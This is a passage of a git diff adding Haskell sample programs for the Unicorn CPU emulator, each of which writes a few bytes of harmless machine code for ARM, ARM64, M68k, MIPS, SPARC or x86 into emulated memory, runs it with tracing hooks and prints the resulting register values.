codeLen = codeLength armCode + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + r0 <- regRead uc Arm.R0 + r1 <- regRead uc Arm.R1 + + return (r0, r1) + case result of + Right (r0, r1) -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> R0 = 0x" ++ showHex r0 + putStrLn $ ">>> R1 = 0x" ++ showHex r1 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +testThumb :: IO () +testThumb = do + putStrLn "Emulate THUMB code" + + result <- runEmulator $ do + -- Initialize emulator in ARM mode + uc <- open ArchArm [ModeThumb] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address thumbCode + + -- Initialize machine registers + regWrite uc Arm.Sp 0x1234 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength thumbCode + start uc (address .|. 1) (address + codeLen) Nothing Nothing + + -- Return the results + sp <- regRead uc Arm.Sp + + return sp + case result of + Right sp -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> SP = 0x" ++ showHex sp + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = do + testArm + putStrLn "==========================" + testThumb diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm64.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm64.hs new file mode 100644 index 0000000..db1158a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm64.hs @@ -0,0 +1,85 @@ +-- Sample code to demonstrate how to emulate ARM64 code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Arm64 as Arm64 + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- add x11, x13, x15 +armCode :: BS.ByteString +armCode = BS.pack [0xab, 0x01, 0x0f, 0x8b] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testArm64 :: IO () +testArm64 = do + putStrLn "Emulate ARM64 code" + + result <- runEmulator $ do + -- Initialize emulator in ARM mode + uc <- open ArchArm64 [ModeArm] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address armCode + + -- Initialize machine registers + regWrite uc Arm64.X11 0x1234 + regWrite uc Arm64.X13 0x6789 + regWrite uc Arm64.X15 0x3333 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength armCode + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + x11 <- regRead uc Arm64.X11 + + return x11 + case result of + Right x11 -> do + -- Now print out some registers + putStrLn $ ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> X11 = 0x" ++ showHex x11 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = + testArm64 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleBatchReg.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleBatchReg.hs new file mode 100644 index 0000000..9b40b3f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleBatchReg.hs @@ -0,0 +1,99 @@ +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.X86 as X86 + +import Control.Monad.Trans.Class (lift) +import qualified Data.ByteString as BS +import Data.Int +import Data.List (intercalate) +import Data.Word +import qualified Numeric as N (showHex) +import System.IO (hPutStrLn, stderr) + +syscallABI :: [X86.Register] +syscallABI = [ X86.Rax + , X86.Rdi + , X86.Rsi + , X86.Rdx + , X86.R10 + , X86.R8 + , X86.R9 + ] + +vals :: [Int64] +vals = [ 200 + , 10 + , 11 + , 12 + , 13 + , 14 + , 15 + ] + +ucPerror :: Error + -> IO () +ucPerror err = + hPutStrLn stderr $ "Error " ++ ": " ++ strerror err + +base :: Word64 +base = 0x10000 + +-- mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov r9, 6; syscall +code :: BS.ByteString +code = BS.pack [ 0x48, 0xc7, 0xc0, 0x64, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc7 + , 0x01, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x02, 0x00, 0x00 + , 0x00, 0x48, 0xc7, 0xc2, 0x03, 0x00, 0x00, 0x00, 0x49, 0xc7 + , 0xc2, 0x04, 0x00, 0x00, 0x00, 0x49, 0xc7, 0xc0, 0x05, 0x00 + , 0x00, 0x00, 0x49, 0xc7, 0xc1, 0x06, 0x00, 0x00, 0x00, 0x0f + , 0x05 + ] + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex i = + N.showHex (fromIntegral i :: Word64) "" + +-- Write a string (with a newline character) to standard output in the emulator +emuPutStrLn :: String -> Emulator () +emuPutStrLn = + lift . putStrLn + +hookSyscall :: SyscallHook () +hookSyscall uc _ = do + runEmulator $ do + readVals <- regReadBatch uc syscallABI + emuPutStrLn $ "syscall: {" + ++ intercalate ", " (map show readVals) + ++ "}" + return () + +hookCode :: CodeHook () +hookCode _ addr size _ = do + putStrLn $ "HOOK_CODE: 0x" ++ showHex addr ++ ", 0x" ++ + maybe "0" showHex size + +main :: IO () +main = do + result <- runEmulator $ do + uc <- open ArchX86 [Mode64] + + -- regWriteBatch + emuPutStrLn "regWriteBatch {200, 10, 11, 12, 13, 14, 15}" + regWriteBatch uc syscallABI vals + + readVals <- regReadBatch uc syscallABI + + emuPutStrLn $ "regReadBatch = {" + ++ intercalate ", " (map show readVals) + ++ "}" + + -- syscall + emuPutStrLn "running syscall shellcode" + syscallHookAdd uc hookSyscall () 1 0 + memMap uc base (0x1000) [ProtAll] + memWrite uc base code + let codeLen = fromIntegral $ BS.length code + start uc base (base + codeLen) Nothing Nothing + case result of + Right _ -> return () + Left err -> ucPerror err diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleM68k.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleM68k.hs new file mode 100644 index 0000000..d77f4cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleM68k.hs @@ -0,0 +1,142 @@ +-- Sample code to demonstrate how to emulate m68k code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.M68k as M68k + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- movq #-19, %d3 +m68kCode :: BS.ByteString +m68kCode = BS.pack [0x76, 0xed] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testM68k :: IO () +testM68k = do + putStrLn "Emulate M68K code" + + result <- runEmulator $ do + -- Initialize emulator in M68K mode + uc <- open ArchM68k [ModeBigEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address m68kCode + + -- Initialize machine registers + regWrite uc M68k.D0 0x0000 + regWrite uc M68k.D1 0x0000 + regWrite uc M68k.D2 0x0000 + regWrite uc M68k.D3 0x0000 + regWrite uc M68k.D4 0x0000 + regWrite uc M68k.D5 0x0000 + regWrite uc M68k.D6 0x0000 + regWrite uc M68k.D7 0x0000 + + regWrite uc M68k.A0 0x0000 + regWrite uc M68k.A1 0x0000 + regWrite uc M68k.A2 0x0000 + regWrite uc M68k.A3 0x0000 + regWrite uc M68k.A4 0x0000 + regWrite uc M68k.A5 0x0000 + regWrite uc M68k.A6 0x0000 + regWrite uc M68k.A7 0x0000 + + regWrite uc M68k.Pc 0x0000 + regWrite uc M68k.Sr 0x0000 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instruction + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength m68kCode + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + d0 <- regRead uc M68k.D0 + d1 <- regRead uc M68k.D1 + d2 <- regRead uc M68k.D2 + d3 <- regRead uc M68k.D3 + d4 <- regRead uc M68k.D4 + d5 <- regRead uc M68k.D5 + d6 <- regRead uc M68k.D6 + d7 <- regRead uc M68k.D7 + + a0 <- regRead uc M68k.A0 + a1 <- regRead uc M68k.A1 + a2 <- regRead uc M68k.A2 + a3 <- regRead uc M68k.A3 + a4 <- regRead uc M68k.A4 + a5 <- regRead uc M68k.A5 + a6 <- regRead uc M68k.A6 + a7 <- regRead uc M68k.A7 + + pc <- regRead uc M68k.Pc + sr <- regRead uc M68k.Sr + + return (d0, d1, d2, d3, d4, d5, d6, d7, + a0, a1, a2, a3, a4, a5, a6, a7, + pc, sr) + case result of + Right (d0, d1, d2, d3, d4, d5, d6, d7, + a0, a1, a2, a3, a4, a5, a6, a7, + pc, sr) -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> A0 = 0x" ++ showHex a0 ++ + "\t\t>>> D0 = 0x" ++ showHex d0 + putStrLn $ ">>> A1 = 0x" ++ showHex a1 ++ + "\t\t>>> D1 = 0x" ++ showHex d1 + putStrLn $ ">>> A2 = 0x" ++ showHex a2 ++ + "\t\t>>> D2 = 0x" ++ showHex d2 + putStrLn $ ">>> A3 = 0x" ++ showHex a3 ++ + "\t\t>>> D3 = 0x" ++ showHex d3 + putStrLn $ ">>> A4 = 0x" ++ showHex a4 ++ + "\t\t>>> D4 = 0x" ++ showHex d4 + putStrLn $ ">>> A5 = 0x" ++ showHex a5 ++ + "\t\t>>> D5 = 0x" ++ showHex d5 + putStrLn $ ">>> A6 = 0x" ++ showHex a6 ++ + "\t\t>>> D6 = 0x" ++ showHex d6 + putStrLn $ ">>> A7 = 0x" ++ showHex a7 ++ + "\t\t>>> D7 = 0x" ++ showHex d7 + putStrLn $ ">>> PC = 0x" ++ showHex pc + putStrLn $ ">>> SR = 0x" ++ showHex sr + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = + testM68k diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleMips.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleMips.hs new file mode 100644 index 0000000..83efdbd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleMips.hs @@ -0,0 +1,129 @@ +-- Sample code to demonstrate how to emulate Mips code (big endian) + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Mips as Mips + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- ori $at, $at, 0x3456 +mipsCodeEb :: BS.ByteString +mipsCodeEb = BS.pack [0x34, 0x21, 0x34, 0x56] + +-- ori $at, $at, 0x3456 +mipsCodeEl :: BS.ByteString +mipsCodeEl = BS.pack [0x56, 0x34, 0x21, 0x34] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testMipsEb :: IO () +testMipsEb = do + putStrLn "Emulate MIPS code (big-endian)" + + result <- runEmulator $ do + -- Initialize emulator in MIPS mode + uc <- open ArchMips [ModeMips32, ModeBigEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address mipsCodeEb + + -- Initialise machine registers + regWrite uc Mips.Reg1 0x6789 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength mipsCodeEb + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + r1 <- regRead uc Mips.Reg1 + + return r1 + case result of + Right r1 -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> R1 = 0x" ++ showHex r1 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +testMipsEl :: IO () +testMipsEl = do + putStrLn "===========================" + putStrLn "Emulate MIPS code (little-endian)" + + result <- runEmulator $ do + -- Initialize emulator in MIPS mode + uc <- open ArchMips [ModeMips32, ModeLittleEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address mipsCodeEl + + -- Initialize machine registers + regWrite uc Mips.Reg1 0x6789 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength mipsCodeEl + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + r1 <- regRead uc Mips.Reg1 + + return r1 + case result of + Right r1 -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> R1 = 0x" ++ showHex r1 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = do + testMipsEb + testMipsEl diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleSparc.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleSparc.hs new file mode 100644 index 0000000..02a0984 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleSparc.hs @@ -0,0 +1,85 @@ +-- Sample code to demonstrate how to emulate Sparc code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Sparc as Sparc + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- add %g1, %g2, %g3 +sparcCode :: BS.ByteString +sparcCode = BS.pack [0x86, 0x00, 0x40, 0x02] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testSparc :: IO () +testSparc = do + putStrLn "Emulate SPARC code" + + result <- runEmulator $ do + -- Initialize emulator in Sparc mode + uc <- open ArchSparc [ModeSparc32, ModeBigEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address sparcCode + + -- Initialize machine registers + regWrite uc Sparc.G1 0x1230 + regWrite uc Sparc.G2 0x6789 + regWrite uc Sparc.G3 0x5555 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions with customized callback + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength sparcCode + start uc address (address + codeLen) Nothing Nothing + + -- Return results + g3 <- regRead uc Sparc.G3 + + return g3 + case result of + Right g3 -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> G3 = 0x" ++ showHex g3 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = + testSparc diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleX86.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleX86.hs new file mode 100644 index 0000000..5f4640e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleX86.hs @@ -0,0 +1,744 @@ +-- Sample code to demonstrate how to emulate X86 code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.X86 as X86 + +import Control.Monad.Trans.Class (lift) +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) +import System.Environment + +-- Code to be emulated +-- +-- inc ecx; dec edx +x86Code32 :: BS.ByteString +x86Code32 = BS.pack [0x41, 0x4a] + +-- jmp 4; nop; nop; nop; nop; nop; nop +x86Code32Jump :: BS.ByteString +x86Code32Jump = BS.pack [0xeb, 0x02, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90] + +-- inc ecx; dec edx; jmp self-loop +x86Code32Loop :: BS.ByteString +x86Code32Loop = BS.pack [0x41, 0x4a, 0xeb, 0xfe] + +-- mov [0xaaaaaaaa], ecx; inc ecx; dec edx +x86Code32MemWrite :: BS.ByteString +x86Code32MemWrite = BS.pack [0x89, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] + +-- mov ecx, [0xaaaaaaaa]; inc ecx; dec edx +x86Code32MemRead :: BS.ByteString +x86Code32MemRead = BS.pack [0x8b, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] + +-- jmp ouside; inc ecx; dec edx +x86Code32JmpInvalid :: BS.ByteString +x86Code32JmpInvalid = BS.pack [0xe9, 0xe9, 0xee, 0xee, 0xee, 0x41, 0x4a] + +-- inc ecx; in al, 0x3f; dec edx; out 0x46, al; inc ebx +x86Code32InOut :: BS.ByteString +x86Code32InOut = BS.pack [0x41, 0xe4, 0x3f, 0x4a, 0xe6, 0x46, 0x43] + +-- inc eax +x86Code32Inc :: BS.ByteString +x86Code32Inc = BS.pack [0x40] + +x86Code64 :: BS.ByteString +x86Code64 = BS.pack [0x41, 0xbc, 0x3b, 0xb0, 0x28, 0x2a, 0x49, 0x0f, 0xc9, + 0x90, 0x4d, 0x0f, 0xad, 0xcf, 0x49, 0x87, 0xfd, 0x90, + 0x48, 0x81, 0xd2, 0x8a, 0xce, 0x77, 0x35, 0x48, 0xf7, + 0xd9, 0x4d, 0x29, 0xf4, 0x49, 0x81, 0xc9, 0xf6, 0x8a, + 0xc6, 0x53, 0x4d, 0x87, 0xed, 0x48, 0x0f, 0xad, 0xd2, + 0x49, 0xf7, 0xd4, 0x48, 0xf7, 0xe1, 0x4d, 0x19, 0xc5, + 0x4d, 0x89, 0xc5, 0x48, 0xf7, 0xd6, 0x41, 0xb8, 0x4f, + 0x8d, 0x6b, 0x59, 0x4d, 0x87, 0xd0, 0x68, 0x6a, 0x1e, + 0x09, 0x3c, 0x59] + +-- add byte ptr [bx + si], al +x86Code16 :: BS.ByteString +x86Code16 = BS.pack [0x00, 0x00] + +-- SYSCALL +x86Code64Syscall :: BS.ByteString +x86Code64Syscall = BS.pack [0x0f, 0x05] + +-- Memory address where emulation starts +address :: Word64 +address = 0x1000000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex i = + N.showHex (fromIntegral i :: Word64) "" + +-- Pretty-print byte string as hex +showHexBS :: BS.ByteString -> String +showHexBS = + concatMap (flip N.showHex "") . reverse . BS.unpack + +-- Write a string (with a newline character) to standard output in the emulator +emuPutStrLn :: String -> Emulator () +emuPutStrLn = + lift . putStrLn + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +-- Callback for tracing basic blocks +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +-- Callback for tracing instruction +hookCode :: CodeHook () +hookCode uc addr size _ = do + runEmulator $ do + emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ maybe "0" showHex size + + eflags <- regRead uc X86.Eflags + emuPutStrLn $ ">>> --- EFLAGS is 0x" ++ showHex eflags + return () + +-- Callback for tracing instruction +hookCode64 :: CodeHook () +hookCode64 uc addr size _ = do + runEmulator $ do + rip <- regRead uc X86.Rip + emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + emuPutStrLn $ ">>> RIP is 0x" ++ showHex rip + return () + +-- Callback for tracing memory access (READ or WRITE) +hookMemInvalid :: MemoryEventHook () +hookMemInvalid uc MemWriteUnmapped addr size (Just value) _ = do + runEmulator $ do + emuPutStrLn $ ">>> Missing memory is being WRITE at 0x" ++ + showHex addr ++ ", data size = " ++ show size ++ + ", data value = 0x" ++ showHex value + memMap uc 0xaaaa0000 (2 * 1024 * 1024) [ProtAll] + return True +hookMemInvalid _ _ _ _ _ _ = + return False + +hookMem64 :: MemoryHook () +hookMem64 _ MemRead addr size _ _ = + putStrLn $ ">>> Memory is being READ at 0x" ++ showHex addr ++ + ", data size = " ++ show size +hookMem64 _ MemWrite addr size (Just value) _ = + putStrLn $ ">>> Memory is being WRITE at 0x" ++ showHex addr ++ + ", data size = " ++ show size ++ ", data value = 0x" ++ + showHex value + +-- Callback for IN instruction (X86) +-- This returns the data read from the port +hookIn :: InHook () +hookIn uc port size _ = do + result <- runEmulator $ do + eip <- regRead uc X86.Eip + + emuPutStrLn $ "--- reading from port 0x" ++ showHex port ++ + ", size: " ++ show size ++ ", address: 0x" ++ showHex eip + + case size of + -- Read 1 byte to AL + 1 -> return 0xf1 + -- Read 2 byte to AX + 2 -> return 0xf2 + -- Read 4 byte to EAX + 4 -> return 0xf4 + -- Should never reach this + _ -> return 0 + case result of + Right r -> return r + Left _ -> return 0 + +-- Callback for OUT instruction (X86) +hookOut :: OutHook () +hookOut uc port size value _ = do + runEmulator $ do + eip <- regRead uc X86.Eip + + emuPutStrLn $ "--- writing to port 0x" ++ showHex port ++ ", size: " ++ + show size ++ ", value: 0x" ++ showHex value ++ + ", address: 0x" ++ showHex eip + + -- Confirm that value is indeed the value of AL/AX/EAX + case size of + 1 -> do + tmp <- regRead uc X86.Al + emuPutStrLn $ "--- register value = 0x" ++ showHex tmp + 2 -> do + tmp <- regRead uc X86.Ax + emuPutStrLn $ "--- register value = 0x" ++ showHex tmp + 4 -> do + tmp <- regRead uc X86.Eax + emuPutStrLn $ "--- register value = 0x" ++ showHex tmp + -- Should never reach this + _ -> return () + return () + +-- Callback for SYSCALL instruction (X86) +hookSyscall :: SyscallHook () +hookSyscall uc _ = do + runEmulator $ do + rax <- regRead uc X86.Rax + if rax == 0x100 then + regWrite uc X86.Rax 0x200 + else + emuPutStrLn $ "ERROR: was not expecting rax=0x" ++ showHex rax ++ + " in syscall" + return () + +testI386 :: IO () +testI386 = do + putStrLn "Emulate i386 code" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32 + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instruction by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32 + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + + -- Read from memory + tmp <- memRead uc address 4 + emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex address ++ + "] = 0x" ++ showHexBS tmp + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testI386Jump :: IO () +testI386Jump = do + putStrLn "===================================" + putStrLn "Emulate i386 code with jump" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32Jump + + -- Tracing 1 basic block with customized callback + blockHookAdd uc hookBlock () address address + + -- Tracing 1 instruction at address + codeHookAdd uc hookCode () address address + + -- Emulate machine code ininfinite time + let codeLen = codeLength x86Code32Jump + start uc address (address + codeLen) Nothing Nothing + + emuPutStrLn ">>> Emulation done. Below is the CPU context" + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that loop forever +testI386Loop :: IO () +testI386Loop = do + putStrLn "===================================" + putStrLn "Emulate i386 code that loop forever" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated in memory + memWrite uc address x86Code32Loop + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Emulate machine code in 2 seconds, so we can quit even if the code + -- loops + let codeLen = codeLength x86Code32Loop + start uc address (address + codeLen) (Just $ 2 * 1000000) Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that read invalid memory +testI386InvalidMemRead :: IO () +testI386InvalidMemRead = do + putStrLn "===================================" + putStrLn "Emulate i386 code that read from invalid memory" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32MemRead + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic block with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions by having @beegin > @end + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32MemRead + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that write invalid memory +testI386InvalidMemWrite :: IO () +testI386InvalidMemWrite = do + putStrLn "===================================" + putStrLn "Emulate i386 code that write to invalid memory" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32MemWrite + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instruction by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Intercept invalid memory events + memoryEventHookAdd uc HookMemReadUnmapped hookMemInvalid () 1 0 + memoryEventHookAdd uc 